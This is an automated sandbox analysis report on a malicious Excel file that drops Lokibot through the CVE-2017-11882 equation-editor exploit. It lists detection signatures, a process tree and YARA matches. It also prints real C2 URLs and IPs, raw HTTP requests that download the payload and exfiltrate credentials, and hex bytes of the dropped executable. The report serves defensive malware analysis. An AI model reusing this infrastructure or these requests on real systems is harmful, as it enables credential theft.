Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Shipping-Documents.xlsx

Overview

General Information

Sample Name:Shipping-Documents.xlsx
Analysis ID:435330
MD5:20e540ed9d02f60f7fb928ed8fe60f1f
SHA1:afa6c289fbeed004fe3a52c666cf32a8ae444e79
SHA256:3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2520 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2724 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2856 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7146B0D2CAED6422C289A08F63A5C685)
      • vbc.exe (PID: 3052 cmdline: C:\Users\Public\vbc.exe MD5: 7146B0D2CAED6422C289A08F63A5C685)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.vbc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          5.2.vbc.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            5.2.vbc.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              5.2.vbc.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              5.2.vbc.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x12fff:$des3: 68 03 66 00 00
              • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 15 entries

              Sigma Overview

              Exploits:

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.89.90.94, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeReversingLabs: Detection: 10%
              Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 10%
              Multi AV Scanner detection for submitted fileShow sources
              Source: Shipping-Documents.xlsxVirustotal: Detection: 40%Perma Link
              Source: Shipping-Documents.xlsxReversingLabs: Detection: 31%

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: excel.exeMemory has grown: Private usage: 4MB later: 64MB
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 63.141.228.141:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 63.141.228.141:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/S4wFP8QBww9Tp
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:29:38 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 00:49:42 GMTETag: "ba000-5c4d77753dec3"Accept-Ranges: bytesContent-Length: 761856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 2
              Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
              Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
              Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
              Source: global trafficHTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: unknownTCP traffic detected without corresponding DNS query: 103.89.90.94
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00404ED4 recv,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive
              Source: unknownHTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Jun 2021 10:29:47 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
              Source: vbc.exe, 00000005.00000002.2182254082.00000000008D4000.00000004.00000020.sdmpString found in binary or memory: http://63.141.228.141/32.php/S4wFP8QBww9Tp
              Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: A6AB76E0.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
              Source: vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: vbc.exeString found in binary or memory: https://github.com/georgw777/
              Source: vbc.exeString found in binary or memory: https://github.com/georgw777/MediaManager
              Source: vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.drString found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
